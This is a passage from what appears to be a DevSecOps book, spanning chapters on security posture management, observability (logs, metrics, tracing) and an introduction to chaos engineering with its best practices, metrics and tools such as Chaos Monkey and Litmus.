Managing workflows You must automate the DevSecOps pipeline to understand where things can go wrong and how to fix them early on. This will help ensure you have a sustainable DevSecOps program. There are multiple measures that we can take for our cloud environment to monitor its usage, resources, and security practices. This will enhance the way we take care of our cloud environment. Let’s look at some of the practices that pave the way toward successfully monitoring an environment.

What measures can we take to monitor an environment?

What measures can we take to monitor an environment? Mapping posture management to the organization’s strategy involves integrating security considerations and measures into the broader strategic planning and execution process within the organization. Think of your organization as a castle. The organization’s strategy is like the blueprint for building and expanding the castle, while security posture management is like the plans for the castle’s defenses – its walls, gates, guards, and watchtowers. Just as a castle’s defenses need to be built with its layout and expansion plans in mind, your organization’s security measures need to be aligned with its strategic objectives. This means that when you’re laying out the strategy for your organization – maybe you’re planning to launch a new online service, or you’re looking to store more customer data – you need to consider how these moves will impact your security. For instance, the new online service could be a new point of vulnerability that attackers might exploit. So, you’d need to strengthen your security posture to defend it. Mapping posture management to the organization’s strategy is about striking a balance. You want to be innovative and drive your organization forward, but not at the expense of exposing it to undue risk. It’s about weaving security into the fabric of your strategic plans so that it becomes a natural part of your organization’s growth and evolution. By doing this, you’re not just bolstering your organization’s defenses, but you’re also showing your stakeholders – be it customers, partners, or regulators – that you take security seriously and that you’re committed to protecting the data and trust they’ve entrusted you with. And in today’s digital world, that’s a pretty solid strategic move in itself.

A positive way toward the cloud-native world Cloud-native environments are the way to go. All the code for environments is hosted in the cloud. The velocity of pushing the code to the cloud has increased many folds, which itself implies that we cannot compromise on the security posture of development pipelines. While moving to the cloud, going with the thought that we need to keep our security secure and compliant gives us an edge. Sacrificing anything leads to big disasters. To promote risk ownership and accountability, we must obtain the most detailed and comprehensive visibility possible in terms of people, processes, technology, and cloud architecture.

Cloud-native architectures Architecting the cloud right is as important as setting up things in-house. Cloud transformation is increasingly being discussed across all corporate environments. We can be sure that almost any organization was either born in the cloud, is currently undergoing a cloud transformation, or is at the very least thinking about undergoing one.

35

36

Understanding the Security Posture

These transformations frequently go hand in hand with the delivery of DevSecOps software. While we leverage these technologies, it is imperative to secure and architect them well, keeping everything in mind. The complexity of assessing our security posture is increased by both the delivery model and the cloud native technologies used.

Provisioning and configuring infrastructure Infrastructure as Code (IaC) principles are fundamental in modern infrastructure management, but they must be implemented securely. However, unfortunately, a lot of organizations do not understand the importance of the security of infrastructure code. It has become a big concern for businesses. Instead, a lot of organizations check out the code manually, which is poorly written, difficult to grasp, and messed up. Retail giants, especially during sales, may scale their environments using IaC, emphasizing the need for secure IaC practices. However, if the code is not secure, we have vulnerabilities from the get-go.

Automating controls Automation, combined with the right tools and collaboration, enhances vulnerability detection and remediation in the DevSecOps life cycle. Tools should help in gathering information about third-party libraries so that we can track open source components. All too often, security takes the back seat in the fast-paced world of technology and business. It’s like the seatbelts in our cars – we know they’re important, we know they can save us from a whole lot of trouble, but sometimes, we only remember to buckle up after we’ve hit a bump or seen a close call. Just think about it. How many times have we heard of a major company experiencing a data breach, only for it to beef up its security measures afterward? This reactive approach to security is like closing the barn door after the horse has bolted. Only after a breach do a lot of organizations start taking it seriously. Enforcing the right policies on infrastructure of code is equally important. Automation can reduce the cost of finding vulnerabilities tremendously and it helps in getting the confidence and buy-in from the developer and testing teams for static application security testing (SAST), software composition analysis (SCA), dynamic application security testing (DAST), penetration testing, and more.

Securing the toolchains Securing the tools used in the DevSecOps pipeline is as crucial as securing the pipeline itself. When we are building the software, we do not wish to break it due to toolchain issues. It is like having a thief sitting next to you and you are telling all your secrets to them, or you are making vulnerable software from the start.

Where does security stand in the whole development process?

Where does security stand in the whole development process? Any unaddressed vulnerability can be exploited, emphasizing the need for proactive security measures in the DevSecOps process. Attaining a 360-degree posture results in asking questions about the following aspects: • What reliance do they have? • Are they internal or exposed applications? • Are all stakeholders involved? • Who has ownership of the data and its vulnerabilities? • What code commits and repositories are available?

Compliance and audit Compliance is one area that needs to be looked upon with utmost importance. It brings together all the technologies and stitches together the pieces that can be missed if they’re not considered. Compliance has always been one area we must consider to be in the market or to show we are on par. However, a unified view of the environments, roles, and susceptibilities alongside meeting the right compliance is important. The same approach should be followed by all teams. Any time a finding needs evidence, the team should support that and provide the relevant data. Regularly evaluating the security posture concerning important compliance standards, including the Health Insurance Portability and Accountability Act (HIPAA), Health Information Trust Alliance (HITRUST), Open WorldWide Application Security Project (OWASP), Payment Card Industry Data Security Standard (PCI DSS), National Institute of Standards and Technology (NIST), Service Organization Control 2 (SOC2), and others is needed.

Multi-cloud security AWS, Azure, IBM Cloud, and GCP are some of the most well-known and most-used cloud service providers on the market. It is imperative to have a clear picture and integration of the services we are using in our environment, as we cannot secure what we're unaware of. As per a 2021 Ponemon Institute research report, misconfiguration is one big challenge in cloud environments and is part of the DevSecOps process. We must ensure that every product team creates cloud applications with security integrated:

37

38

Understanding the Security Posture

Figure 3.1 – Multi-cloud environment

Monitoring As much as we are automating the DevSecOps process, automating monitoring and incident generation is equally important. Monitoring should be done at all stages to make sure we can figure out failures and take action on them. Without monitoring, we can never act upon issues. We need to have a proper database of applications to know about the application components so that we can address security gaps.

Incident response Incident response should be triggered as soon as the issues are detected, and we need to get help from functions that act as service components, such as Lambda functions. Responding to incidents at the right time gives us the power to understand our environments. There must be proper documentation on how to respond to an incident.

Developer tools Developers need to be enabled and they must be able to collaborate with the Sec team. The Sec team should also speak in the developer’s language by reporting its findings so that developers understand them. It completes the cycle and ensures better actionality on the vulnerabilities. It also reduces the security issues related to any possible misses or miscommunication.

Vulnerability management Someone rightly said, “Any vulnerability can become an exploit or a breach without warning.” There is no rule that a vulnerability must be detected before it can be weaponized. Anyone can play around with weaknesses in the system. Let’s look at some pointers around how vulnerability management can help.

Summary

Vulnerability management helps with the following aspects: • Understanding risk matrices and assurance checks in the pipeline, and reducing the reliance of security on runtime tools, security checks, and manual code reviews. • Finding vulnerabilities not just in the in-house code but in open source software (OSS), open source libraries, dependencies, containers, and IaC configuration. • Automating the DevOps process and the vulnerability trigger actions. By doing this, we can reduce the time spent by development teams on finding and fixing security issues. Knowing about every component we use, getting to know new issues, vulnerabilities, and alerts, and figuring out how they need to be addressed are all part of security posture management.

Summary Wrapping up this chapter, let’s take a step back and look at the big picture. When we talk about security posture management, it’s not just some technical jargon that’s reserved for the IT department. No, it’s much more than that – it’s about the safety and integrity of the whole organization in this digital age, where threats could emerge from any corner of the internet. What we’ve learned from this chapter is that security posture management is like an ongoing journey, not a destination. It’s not something you set and forget. It’s a continuous commitment that needs consistent attention, effort, and resources. You can’t just check a few boxes, install some software, and call it a day. Let’s revisit the main stages of this journey: risk management, vulnerability management, creating sound security policies, and staying vigilant through continuous monitoring. All of these steps weave together to form a protective net around our valuable data and systems. Think of risk and vulnerability management as our eyes and ears on the ground. They help us spot trouble before it finds us. Security policies are our game plan, guiding us on what to do and when to do it. And continuous monitoring? That’s our ever-watchful guardian, keeping an eye on things at all times. But the tech side is just half the story. The human element is equally crucial. To manage our security posture effectively, we need to make sure everyone in our organization understands the importance of security. Regular training sessions, audits, and tests aren’t just bureaucratic red tape; they’re our team drills, keeping us prepared and ready to act. In essence, this chapter circles back to one thing: security posture management is crucial for every organization. It’s a shield we need to maintain diligently to protect our data, uphold our reputation, and ensure we can keep doing what we do without disruption. So, let’s not take it lightly; in the face of cyber threats, a strong security posture is our best defense.

39

4 Understanding Observability Observability, in the context of DevOps, refers to the capacity to track and analyze important data, such as system performance, resource consumption, and error rates, to spot possible issues and raise the system’s overall stability and reliability. Observability can be thought of as insights into metrics, traces, and logs in a microservices architecture’s implementation environment. Some claim that observability is more akin to continuously monitoring various pipeline components to maintain compliance, checking metrics continuously for vulnerabilities based on a risk level, and more. There’s one thing to remember: observability is not to be confused with monitoring or application performance monitoring. These are separate things to be considered. Observability cannot circumvent or replace the need for monitoring. Monitoring is a subset of observability – it involves learning from what you already know about what you don’t know. In this chapter, we will cover the following topics: • Why do we need observability? • The key functions of observability • Linking observability with monitoring • Exploring the monitoring process • Implementing observability with monitoring • Challenges around observability • Making organizations observable

Why do we need observability? Observability, or the capacity to comprehend what is happening within a system, is very helpful for an organization. A lot of discussion around observability is that the site reliability engineering (SRE) team takes care of it, but it helps in understanding the systems and applications and provides a context around the modern applications that we have. It provides information about what needs to

42

Understanding Observability

be tested and why that needs to be tested. This, in turn, helps in improving the system’s performance and quality and bringing the teams together. A lot of times, when an issue arises, it is very difficult to figure out where things went south with traditional methods. We keep looking at logs with no real results and hit a dead end. Production issues are very common. Observability gives meaningful insights by separating the different aspects of logs and providing meaningful insights. Observability is not new and is an integral part of the ecosystem; it provides insights into issues, identifies them early on, and resolves them for the organization if they’ve been set up correctly. Output defines a lot about the system’s performance, which can also be checked by observability. Better observability provides quicker insights about any issues around the system. For example, as we are modernizing our environments and shifting our workloads to the cloud, there may be downtimes; however, if we have set up observability right, it is easier and quicker to detect any issues or downtimes. You would also be able to figure out any performance-level concerns and the reason behind them. We must also collaborate in different environments by keeping track of all the assets, monitoring them, and fixing any possible issues to make sure they meet the business needs. Observability gives quicker insights into issues that exist, even when we have no idea they exist. Especially when we are moving toward the cloud, we have so many issues that we tend not to know about since the cloud is so vast. Here, observability takes the front seat and provides holistic information about systems.

The key functions of observability Observability has three main pillars of success when it comes to finding and gaining measurements: logs, metrics, and tracing. Raw telemetry data from backend applications can be observed, however, it might not give us the complete picture of the systems that are operating in the backend. We need to understand the frontend application data as well as the backend application data to get a complete view of application performance. These three pillars can be extended. Let’s take a look: • Logs: Logs are generated from any activity that occurs in systems and applications (when configured properly). Logs can be in plain text or structured or unstructured form. Logs contain the minutest details about event activities, including timestamps and the context behind them. • Metrics: Metrics define the statistics and criteria to measure the aspects of an application. These could be based on the network, hardware, or infrastructure. They can also gather information about when an application can go down, the capacity of the system, and when there is a huge amount of traffic. They define the behavior of the application. • Tracing: Tracing helps in figuring out the flow of the data, from the user to the backend. For example, it can show how the user will make a request and the backend will provide the necessary information.

The key functions of observability

All three pillars are essential to observability, but each has restrictions that need to be paid attention to: • Metrics can be complex to categorize and sort, making them difficult to utilize for troubleshooting; sorting and aggregating logs to derive useful conclusions or relationships can be difficult; and traces can generate colossal volumes of pointless data • Consequently, observability practitioners may still run into obstacles to gaining true insight, feel there are too many locations to look for problems, or struggle to drill down to turn concerns into problems that can be addressed All of this helps in turning a bad user experience into a great user experience. Observability adds – a traditional way of working and the user’s perspective about application usage. This can all be tested in pre-production environments. It is imperative to keep track of the third-party components or dependencies to check out the codelevel issues as well. Once all the data has been gathered from logs, metrics, tracing, dependencies, and more, observability provides contextual information to the different teams involved in the DevOps processes. Observability can throw light on these three pillars and specify the where, why, and what of any event that can point to, cause, or be used to address a system issue with an application or generate deeper information. Regarding application observability, similar methods are used by network observability systems, wherein information is gathered on the network. Here, data involves logs from network devices such as switches, routers, or firewalls. They provide deep-level information about the network. They also provide network performance information, which can be correlated with application-level data. SRE teams ensure that application performance is handled properly, with DevOps being center stage. Observability tools have a lot to offer when we talk about providing tons of features based on the environment’s needs. However, some common functionalities are used by organizations: • Visualize data and associated analytics in customized real-time dashboards • Produce native data, either using agents or without • Effectively store and retrieve massive amounts of data • Deliver meaningful reports, forecast long-term trends, and issue severity warnings • Ingest data generated by other monitoring mechanisms • Process vast volumes of diverse data to produce relevant insights Observability also ensures the following: • Modern cloud environments have a safer connection with in-house environments • APIs and microservices are tested for any possible availability issues • Application testing is performed to test any possible security flaws • Business risks are tested for

43

44

Understanding Observability

Finally, observability tools help organizations make the right decisions around data sources, as well as any monetary constraints.

Linking observability with monitoring Linking observability with monitoring involves establishing a strong connection between the two concepts to enhance system understanding and performance. Observability provides a holistic approach to system visibility, while monitoring focuses on collecting and analyzing data for specific metrics and events. By linking observability with monitoring, organizations can achieve the following: • Comprehensive system insights • Proactive issue detection • Contextual analysis • Improved troubleshooting and debugging • Scalability and performance optimization • Enhanced incident response

Exploring the monitoring process Monitoring is the process of checking for data from known sources and analyzing it. It helps teams have a better understanding of their assets. With monitoring, the rules are pre-defined for capturing the logs from the network or applications. Within an organization, some people monitor assets for specific logs based on the metrics defined to look for any events or incidents and gain meaningful information from the raw logs. There could be known signatures or specific messages that have been generated, all of which will be actionable. With monitoring, we can figure out any changes that are not supposed to happen or are abnormal, such as any activity leading to a spike in events or authentication failure. Monitoring is one of the key elements of understanding any changes in a system’s environment. Monitoring teams create dashboards with pre-configured rules, which help in alerting in case of any changes in the rules or the environment. There can be a chance of missing out on some events if there are enormous false events. It is important to set up and configure the monitoring tools correctly. This is done in passive mode to help with the investigation at a later stage, which may also be overwhelming. Logs, events, asset databases, microservices, and application programming interfaces (APIs) are a few examples of the sources that are used in monitoring to acquire the information needed. With monitoring, we might miss certain aspects as we're very well acquainted with the infrastructure. Observability and monitoring may sound different and similar at the same time. They are relative to each other. Monitoring helps in getting to know any issues regarding the known systems, whereas observability provides contextual information. The issues exist but are not known.

Linking observability with monitoring

With growing needs and huge, complex environments, multiple possibilities exist that might confuse us and leave us not knowing what to look for, with what tool, and why only that specific item or data source needs to be checked. It is of utmost importance to build the right context on what, why, and how it needs to be monitored. The systems under observability, also known as observable systems, provide the right dataset across the environments. This could be in the form of performance data, speed, velocity, or events. All of this can be correlated and aggregated in real time to build an accurate set of information that can be understood alongside the user data. Another interesting area of observability is tagging, which helps in mapping applications, networks, and information to meaningful information and insights. Systems information should not be constrained or limited to the team that is monitoring. With the evolution of the DevOps era, it is of utmost importance that SREs, developers, and testers have insights into the information related to the systems that will enable them to drive decisions about performance and enhance system performance. This, in turn, will lead to stable environments that can be debugged with fewer downtime or outages. For example, monitoring can be easily done on a smaller set of data sources or smaller environments that will monitor system usage, CPU utilization, and any changes in the environment. However, for bigger or enterprise setups, it is good to have a correlation between different datasets and understand what’s happening within the environments. It is good to have observability in smaller environments as well. The assumption behind observability is that data sources will contribute to planning the nature, timing, and auditing procedures of the system, which will then accurately reflect the state of an application or system. Observability, when combined with monitoring, is similar to the classic match of salt and pepper.

Implementing observability with monitoring To implement observability with monitoring, a thorough system must be set up to collect, examine, and interpret pertinent data to understand system behavior, performance, and problems. Choosing the best monitoring tools and setting your objectives are the first steps in the process. Instrumentation is put in place after the crucial measurements, logs, and events have been identified. Centralized data collection, storage, analysis, and visualization are performed before the data is presented in a humanreadable format. Based on comments and insights, continual improvement is pursued and alerting and notification mechanisms are created. Observability and monitoring are further improved as incident response procedures and setup documents are integrated into them. Here are some things to consider: • Measure any downtimes or indicators that provide information for any possible outages • Implement systems that can detect any possible issue for outages or bugs early on • Detect unauthorized activities early on • Based on the system’s information, make forecasts or plan for a system’s performance • Detect any possible changes in the environment

45

46

Understanding Observability

With observability and monitoring, it is easier to get the absolute data, which can help in figuring out underlying issues and root causes to fix the problems at hand. At the same time, it can help us avoid similar issues in the future. Observable environments are meant to help us figure out patterns and similar issues for future reference. Effective monitoring and observability implementation depends on several factors. Before too much damage is done, your monitoring should inform you of what is broken and assist you in understanding why. Time-to-restore (TTR) is a crucial measure in the event of an outage or a deterioration in service. The capacity to quickly identify what went wrong and the quickest route to resuming service is a critical factor in TTR. DevOps’s popularity has changed the software development life cycle (SDLC). Monitoring is increasingly used to increase the observability of the system rather than simply collecting and analyzing log data, measurements, and disseminated event traces. Therefore, the development segment is included in the realm of observability, which would be greatly facilitated by the SDLC pipeline’s individual methods and technologies. It also helps the team spot possible problems in systems before they have an impact on end users and can be further improved by continuous iteration based on performance feedback. Developers, testers, the Ops team, and SREs gain enhanced agility from observability’s actionable intelligence for performance optimization, staying ahead of any potential service deterioration or failures. In addition to technologies, observability describes the strategy, organizational characteristics, and priorities used to achieve the proper observability goals and, as a consequence, the value of monitoring activities.

Challenges around observability Everything has pros and cons. Observability is no different. Observability also has certain challenges while taking care of infrastructure, applications, and the networks behind them. The organization must deal with these issues, which can be challenging. Cloud systems generate a substantially higher amount of telemetry data, especially when microservices, APIs, and containerized applications are involved. This data is humongous for teams to handle at the speed it is generated at. The information flow may pause certain observability issues: • False negatives or accidental invisibility: Incorrectly mapping or misconfiguring data sources might lead to not getting the right visibility or observability around the system, which would lead to issues and bugs being missed while performing analysis. • Improper data: Missing out on collecting the right information from the data sources and understanding system information through data flows is not accurate and can lead to observability issues. • Acquiring information in the correct format: Different systems generate data logs in various formats, and if data aggregation is not done correctly or unsupported formats are encountered, important information may be missed. It is crucial to ensure that the data is collected and processed in a standardized and compatible format to avoid data loss or misinterpretation.

Making organizations observable

• Data fragmentation and complexity: Understanding the interdependencies between applications, multiple cloud platforms, and various digital channels such as the web, mobile, and IoT can be challenging due to the presence of different agents, diverse data sources, and monitoring tools that operate in isolated environments. This fragmentation makes it difficult to gain a holistic view of the system and identify correlations and potential issues across different components. • Navigating complex environments: In modern cloud environments that are continuously evolving, finding solutions amid the enormous volume of raw data generated by each component can be highly demanding. This complexity is further amplified with technologies such as Kubernetes and containers, which rapidly spin up and down, introducing additional data streams that need to be effectively managed and analyzed. • Reducing dependency on manual intervention: When IT workers are required to manually instrument and modify code for every new type of component or agent, a significant portion of their time is consumed in setting up observability rather than utilizing insights from observability data to drive innovation. • Potential to log sensitive data in cleartext: It might log sensitive information in clear text, which can be troublesome. Automating these processes and establishing standardized practices can free up valuable resources and enable more focus on deriving meaningful insights from observability data. • Creating proper testing and pre-production environments: Even with load testing conducted in pre-production, developers often lack a suitable means of observing and comprehending how real users would interact with applications and infrastructure before deploying the code into production. Establishing dedicated test playgrounds or pre-production environments that simulate real-world conditions can provide developers with valuable insights into the performance and behavior of their systems, leading to more robust and reliable deployments.

Making organizations observable The first step toward making an organization observable is ensuring their thought process involves observability. Cloud systems are complex, with enormous amounts of data that needs to be ingested from systems, applications, and the network. This data is needed for accurate analytics so that actions or actionable insights can be followed up. It would be hard to get greater insights from observable systems if we don’t gather them in the right formats. It is of utmost importance to have meaningful output. Various steps can be followed to set up observability or make data observable: • Establish observability objectives: Recognize what is being observed, why, and what advantages the firm hopes to gain from observability. • Properly configure outputs: Set up dashboards, alerting, and reporting to produce results that are useful and actionable. Consider configuring temporal parameters that could forgo an alert if the parameter returns to normal within a specific amount of time, as opposed to setting static alerting thresholds.

47

48

Understanding Observability

• Perform data curation for observability: Don’t waste time generating or ingesting data that is not pertinent to the specified aims. Review your data sources and think about adding context or changing the way data is collected to improve observability, such as adding information to logs. For easier trend detection in a time series, certain data may be aggregated or rolled up. • Look for results that can be put into practice: Look for useful data to develop actionable outputs, such as user effects on services and applications, as details are readily lost in the cacophony of daily operations. The benefit of observability can be summed up as follows: given all other factors being equal, a more observable system is easier to understand (both broadly and in great detail), monitor, update, and fix than a less visible one. More specifically, observability helps an organization achieve the Agile/DevOps/ SRE goals of providing better software more quickly by enabling it to do the following: • Improve the system’s performance • Find bugs early on • Enhance the user experience • Bring teams together • Enhance the availability of systems • Reduce the operational cost • Figure out and measure relevant information • Find critical and high-severity vulnerabilities so that they can be mitigated early on • Find and fix misconfigurations • Discover hidden unknowns • Test the impact on the end user experience • Automatically fix issues and perform remediation

Summary In the world of complex digital systems, a simple “ping” isn’t enough. You need to know how different parts of your ecosystem interact, what’s normal, and what’s not. This chapter took you through this journey, teaching you to embrace the three game-changing pillars: metrics, traces, and logs. You must understand not just the what, but the why and how of system performance and behavior. We need to get the full picture, not just snapshots. Many believe that observability is just about tools. But this book begs to differ! Get ready to map out a strategy that involves not just collecting data but making meaningful decisions based on it. Your systems generate a goldmine of data; learn how to extract valuable nuggets of insight from the digital noise.

Summary

By offering insights into system behavior, spotting abnormalities, and facilitating quick incident response, observability is a potent strategy for improving security. Organizations may fortify their defenses and lessen the impact of security incidents by integrating observability into their security practices. There are some important lessons in this sector: first, gaining insights into system activity is made possible through observability, allowing security concerns to be identified and reacted to quickly. Secondly, enhancing forensic investigations by incorporating observability tools and methodologies helps identify and prosecute cybercriminals. The adoption of cutting-edge technology, such as artificial intelligence, machine learning, distributed tracing, and standardized frameworks, is crucial for the future of observability and security. Observabilitydriven threat hunting and mitigation have the potential to automate incident response and provide a proactive defense. Overall, organizations may continue to strengthen their security posture, efficiently detect and address threats, and protect their systems and data in a threat environment that is constantly changing by adopting observability and keeping up with developing trends. This chapter acted as a one-stop guide to help transform you from a systems spectator into a digital detective. You went beyond merely watching dashboards to actively exploring your software, understanding its behaviors and quirks, and, most importantly, what to do when things go haywire. One of this book’s golden nuggets is its focus on the human element. Observability isn’t a solo expedition; it’s a team sport. This is where you will learn how to bridge the communication gap between DevOps, SysAdmins, and other tech teams to create a cohesive, efficient approach to diagnosing and solving problems. Remember, in the sprawling jungle of microservices, APIs, servers, and databases, observability is your superpower. Don’t just settle for knowing that a system is down; understand why it crashed, how to fix it, and how to prevent it from happening again. You’re not just putting out fires – you’re becoming a fireproof organization. Understanding observability is a mindset. Make the shift and turn the lights on in your darkened digital room. After all, in the world of technology, seeing isn’t just believing; it’s succeeding. In the next chapter, we will understand what chaos engineering is and look at its different techniques and principles.

49

5 Understanding Chaos Engineering In the electrifying dance of the digital world, where systems are complex and ever-evolving, there is one partner that often steps on the toes of others: security. Yet, it’s this dance partner that ensures the whole performance doesn’t descend into a chaotic whirl. In this chapter, we’ll explore how chaos engineering twirls with security to create a performance that’s as harmonious as it is resilient. Chaos engineering is a discipline that encourages us to challenge our systems, to stress-test them in unexpected ways, and to learn from these experiences to build stronger, more resilient systems. It’s like a vaccine, exposing our systems to small, controlled doses of chaos to build immunity against larger, more damaging disruptions. So, how does this intersect with security, a field that is all about maintaining integrity, confidentiality, and availability? Can chaos engineering and security dance in sync, each complementing and enhancing the other, to create a more resilient and secure digital ecosystem? In this chapter, we’ll explore this question, delving into how chaos engineering can be used to improve the security of our systems. We’ll see how injecting controlled security incidents can help us identify weaknesses, improve response mechanisms, and build systems that are not just robust, but truly secure and resilient. Just as a dancer anticipates their partner’s moves, understands their rhythm, and responds in real time to their actions, chaos engineering and security must work together, anticipate potential threats, understand system behaviors, and respond effectively to security incidents. So, grab your dancing shoes as we delve into the intriguing waltz of chaos engineering and security, a dance that is sure to leave our systems stronger, more resilient, and better prepared for the chaotic, unpredictable dance floor of the digital world. Let’s explore how these two disciplines can become dance partners, rather than adversaries, in our quest for a truly secure and resilient digital infrastructure.

52

Understanding Chaos Engineering

In this chapter, we will cover the following topics: • Techniques involved in chaos engineering • Tools involved in performing chaos engineering • Basic principles of chaos engineering • How it is different from other testing measures

Introducing chaos engineering Chaos engineering has its roots in things such as safety engineering in contexts such as aerospace engineering, where structures and components are tested to just before the point of failure. Chaos engineering can be applied to various systems, including IT infrastructure, software systems, and business processes. It is typically performed by injecting simulated failures or “chaos” into the system and observing how it responds. This allows engineers to identify and fix problems before they cause a real-world loss or outage. Several different techniques can be used to perform chaos engineering, including the following: • Randomly killing or failing processes or services • Introducing network delays or packet loss • Increasing or decreasing the system load • Removing or adding resources • Changing system configurations A team of engineers usually conducts the process of chaos engineering, and it is often automated using specialized tools such as Chaos Monkey that can monitor and control the system during the test. It is important to note that chaos engineering should be performed with caution and control to minimize the risk of unintended consequences. Let’s look at an example. An e-commerce company wants to test the resilience of its distribution system, which handles high levels of traffic during peak hours. The company will conduct a chaos engineering experiment by intentionally introducing network partitions and delays between different parts of the system. The company will then monitor the system to see how it responds to those network partitions and delays.

Introducing chaos engineering

The results of the experiment may show that the system was able to handle the network partitions and delays without any significant impact on its performance. However, the company may also identify some bottlenecks or areas that need improvement, such as slow response times for certain requests or increased error rates. Based on the results, the company could then take steps to improve the resilience of the system. This is just an example of a chaos engineering experiment, and the specific results will vary depending on the system being tested and the objectives of the experiment. The experiment should also be done under controlled conditions with a well-defined plan, a clear scope and set of objectives, and with monitoring and safety mechanisms in place.

Why do we need chaos engineering? Imagine you’re on a ship, sailing across the ocean. It’s easy to navigate when the sea is calm and the skies are clear, but what happens when a storm comes? That’s when you need to rely on the strength and reliability of your ship, the skills of the crew, and your preparedness for such situations. That’s exactly what chaos engineering is for our digital systems. Here are a few reasons why chaos engineering is essential: • Improving resilience: By intentionally introducing failures, chaos engineering helps identify and enhance a system’s resilience. By simulating different types of losses, engineers can design and implement solutions that allow the system to keep running in case of any failure. • A better understanding of the system: Chaos engineering allows engineers to understand how a system behaves under different conditions. This helps identify potential weaknesses or bottlenecks that may not be apparent during regular operation. • Improving incident response: By simulating different failures, chaos engineering helps organizations identify and improve their incident response plans. • Identifying dependencies: By simulating different types of failures, chaos engineering helps engineers understand how various system components depend on each other. This helps identify areas where a failure in one component could have a cascading effect on the entire system. • Improved user experience: By simulating different types of failures and identifying potential bottlenecks, chaos engineering can help to improve the overall user experience by ensuring that the system remains available and responsive even under heavy load. • Cost savings: By identifying and mitigating potential issues before they lead to real-world failures, chaos engineering can help to reduce the costs associated with downtime and incident response. • Compliance and regulatory requirements: By simulating different types of failures and testing incident response plans, chaos engineering can help organizations ensure they are in compliance with various regulatory requirements including PCI DSS, HIPAA, and GDPR.

53

54

Understanding Chaos Engineering

Best practices while working with chaos engineering There are several best practices and methodologies that organizations can follow when working with chaos engineering: • Define your scope and objectives: Before beginning any chaos engineering experiments, it is important to define the scope of the test and the objectives you hope to achieve. This will help to ensure that the test stays focused and that the results can easily be interpreted. • Start small: It is best to start with small, controlled experiments before moving on to more complex or wide-scale tests. This will help to minimize the risk of unintended consequences and will also allow you to test and refine your monitoring and safety mechanisms. • Establish safety mechanisms: Before conducting any chaos engineering experiments, it is important to establish safety mechanisms that can be used to quickly and safely stop the test if it begins to have unintended consequences. • Monitor the system: It is important to monitor the system during chaos engineering experiments to ensure that the system is behaving as expected and to detect any unintended consequences. • Communicate with stakeholders: Before conducting any chaos engineering experiments, it is important to communicate with stakeholders to check out tests and understand their purpose. • Plan and execute: Develop a plan for the experiment, execute it, and analyze the results. • Continuously improve: Continuously improve the system by fixing any issues identified during the experiments and making sure to update incident response plans. It’s important to note that these are just a few best practices and methodologies for working with chaos engineering. The specific approach will depend on the organization and the system being tested. It’s also important to note that chaos engineering should only be conducted by experienced engineers who have a good understanding of the system being tested and the risks involved.

Techniques involved in chaos engineering The approach an organization takes to chaos engineering will vary depending on the organization’s size, industry, and systems in place. Some organizations may have a dedicated team or department that is responsible for performing chaos engineering experiments, while others may include chaos engineering as a part of their overall security or reliability testing. Some organizations may have a more formalized process for conducting chaos engineering experiments, including defined scope, objectives, and safety mechanisms. Others may have a more ad hoc approach, conducting experiments on an as-needed basis. Some organizations may also use specialized tools and platforms for performing chaos engineering experiments, while others may rely on manual testing methods.

Measuring the effectiveness of performing chaos engineering

The organization should also document the results and use that to improve incident response plans, security, and user experience.

Specific systems and services that organizations use for chaos engineering The specific systems and services that an organization uses chaos engineering on will vary depending on the organization. Some common systems and services that organizations may use chaos engineering on include the following: • IT infrastructure: Networking, servers, storage, and other IT infrastructure components • Cloud services: Testing the resiliency and fault tolerance of cloud-based services such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform • Microservices: Testing the fault tolerance of microservice-based architectures • Containers: Testing the resiliency of container-based deployments such as Docker and Kubernetes • Databases: Testing the resiliency of databases such as MySQL, MongoDB, and Cassandra • Applications: Testing the fault tolerance of web, mobile, and other applications • Business processes: Testing the resiliency of business processes such as supply chain management, order fulfillment, and customer service It’s important to note that the specific systems and services an organization uses chaos engineering on will depend on their infrastructure, the criticality of the systems, and the organization’s risk appetite.

Measuring the effectiveness of performing chaos engineering Measuring the effectiveness of chaos engineering efforts will differ from organization to organization. Organizations may use the following metrics to evaluate the effectiveness of their chaos engineering efforts: • Mean Time to Recovery (MTTR): This metric measures the time it takes for the system to recover after a failure. A shorter MTTR indicates a more resilient system. • Mean Time between Failures (MTBF): This metric measures the time between failures. A longer MTBF indicates a more reliable system. • Error rate: This metric measures the number of errors that occur during normal operation or after a failure. A lower error rate indicates a more stable system.

55

56

Understanding Chaos Engineering

• Latency: This metric measures the time it takes for a request to be processed and a response to be returned. Lower latency indicates a more responsive system. • Availability: This metric measures the percentage of time that the system is available and able to handle requests. A higher availability indicates a more reliable system. • Impact on users: This metric measures the impact of the failure on users or customers. This can be done through surveys, user feedback, or analyzing the customer service tickets. • Incidents: This metric measures the number of incidents and their severity. • Root cause analysis: This analysis identifies the root cause of an incident. It’s important to note that these are just a few examples of metrics that can be used to evaluate the effectiveness of chaos engineering efforts. The specific metrics used will depend on the organization and the systems being tested. Additionally, it’s important to have a clear set of objectives and a defined scope for the experiment before starting in order to be able to measure the effectiveness of the chaos engineering effort.

Tools involved in chaos engineering The following is a list of some popular tools used in chaos engineering practices: • Chaos Monkey: Originally developed by Netflix, Chaos Monkey randomly terminates virtual machine instances and containers to ensure that engineers implement their services to be resilient to instance failures (https://github.com/Netflix/chaosmonkey). • Chaos Toolkit: Chaos Toolkit is a simple and extensible toolkit for chaos engineering experiments. It has a clear focus on the user’s objectives and provides a way to define, execute, and analyze experiments (https://chaostoolkit.org). • Gremlin: Gremlin provides a full suite of tools to perform chaos engineering experiments safely and securely across a variety of platforms, including Kubernetes, AWS, GCP, and Azure. • Litmus: Litmus is a Kubernetes-native chaos engineering tool that helps teams identify weaknesses in their deployments. It offers a variety of chaos experiments for various infra components (https://litmuschaos.io/). • PowerfulSeal: PowerfulSeal injects failure into your Kubernetes clusters, helping you detect problems as early as possible (https://github.com/bloomberg/powerfulseal). • Chaos Mesh: Chaos Mesh is a cloud-native chaos engineering platform that orchestrates chaos on Kubernetes environments (https://chaos-mesh.org/). • Kube-monkey: This is an implementation of Netflix’s Chaos Monkey for Kubernetes clusters. It randomly deletes Kubernetes Pods (https://github.com/asobti/kube-monkey).

Basic principles of chaos engineering

